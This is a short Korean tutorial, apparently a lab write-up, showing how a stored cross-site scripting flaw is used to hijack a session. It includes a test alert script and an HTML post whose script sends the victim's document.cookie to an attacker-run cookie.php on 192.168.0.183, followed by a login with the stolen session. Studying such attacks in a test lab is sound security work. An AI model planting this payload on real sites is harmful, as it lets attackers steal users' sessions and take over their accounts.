크로스사이트 스크립트를 이용하여 세션탈취

크로스사이트 스크립트를 이용하여 세션탈취

 

준비

 

1.테스트서버구축 

2.공격자(해커)서버

3.정상사용자

 

 

 

 

테스트서버에 일단 크로스사이트스크립트  취약점 이있는지 확인해본다.

 

가장기본적인 스크립트문 <script>alert("HI")</script>

 

글을 등록해보자

 

 

 

 

글을 등록하고 확인하면 스크립트가 정상실행 된다.

 

그럼이페이지는 크로스사이트 스크립트 취약점이있는 페이지다.

 

 

그럼테스트 시작

 

 

 

 

공격자(해커)서버 htdocs 아래에 cookie.php 파일을 만들어준다

 

팝업 사진도 같이 만들준다.

 

저장하고

 

서버도 재시작 ......

 

 

 

 

 

공격자(해커) 계정으로 접속하여 해당테스트 글을 작성한다

 

 

<html>
<head>who</head>
<title>who</title>
<script>window.open("hxxp://192.168.0.183/cookie.php?data="+document.cookie,"small",'width=150,height=220,scrollbars=no,menubar=no')</script>
</html>

 

 

글을 등록한다.

 

 

 

 

 

이제 피해자 PC로 접속하여보자.

 

글이 올라와있다 글을 읽으면

 

 

 

팝업이 정상적으로 뜬다........

 

 

 

 

공격자 서버를 확인해보자

 

data 값에 세션값이 저장되어있다..

 

세션값을복사 한다

 

 

 

 

 

복사한 세션값을 적용하여 로그인을 시도 하면?????

 

 

 

정상적으로 접속이 되었다.

 

 

 

간단한 크로스사이트스크립트 취약점을 이용한 공격법이였다.